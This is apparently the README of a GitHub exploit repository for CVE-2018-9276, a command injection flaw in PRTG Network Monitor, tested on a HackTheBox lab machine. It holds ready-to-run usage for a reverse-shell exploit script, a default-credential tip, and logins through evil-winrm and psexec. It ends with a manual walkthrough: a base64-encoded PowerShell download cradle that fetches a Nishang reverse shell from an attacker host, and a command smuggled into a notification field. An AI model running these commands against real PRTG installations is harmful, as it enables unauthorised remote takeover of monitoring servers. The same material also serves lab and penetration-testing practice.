CVE-2018-9276 Authenticated Command Injection

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

Dependancies

• Impacket (python3 version)
• Netcat
• Msfvenom

Usage

git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass

1. The credentials are needed for performing the exploit. Try default credentials prtgadmin:prtgadmin. Also try CVE-2018-19410 for setup an account without auth. It might be worth checking the database or log to gain them. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
2. Try --lport 445 if the port has not been occupied
3. There are few twisted comments in the code. They might need some modifications.
4. It might take few attempts to succeed. Reboot a target machine is always a good option. Especially when your payload causes some impact.

Test coverage

HTB Netmon box

OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

Credit

A Big Thank you for wildkindcc's python2 version https://github.com/wildkindcc/CVE-2018-9276

Expand Knowledge

Another CVE-2018-19410 for grabbing credentials

https://medium.com/@qdoan95/building-an-exploit-for-cve-2018-19410-1475f555f74c

Using metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Remote Code Execution

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Usage sample

The credentials are needed for performing the exploit. First login and get the authenticated cookie to add a new user.

./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Advanced manually exploit without adding new user

Credit belong to HTB offical writeup

POC: https://www.codewatch.org/blog/?p=453 Plus using SMB to get reverse shell https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

In case we don’t want to add a user, for better OPSEC we can get a reverse shell. However due to HTML encoding many characters get encoded. We can bypass this using powershell base64 execution. We need to create a base64 encoded command. However, it should be in the encoding which WIndows uses i.e UTF-16LE

❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

We use iconv to convert it to target encoding and will execute this reverse shell from Nishang. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Download the script and echo in the command to the last line.

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

Now start a simple HTTP server and create a new notification

python3 -m http.server 80

Click on Setup > Account Settings > Notifications -> click on “Add new notification” on the extreme right Trigger the notification by clicking the Bell button

abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=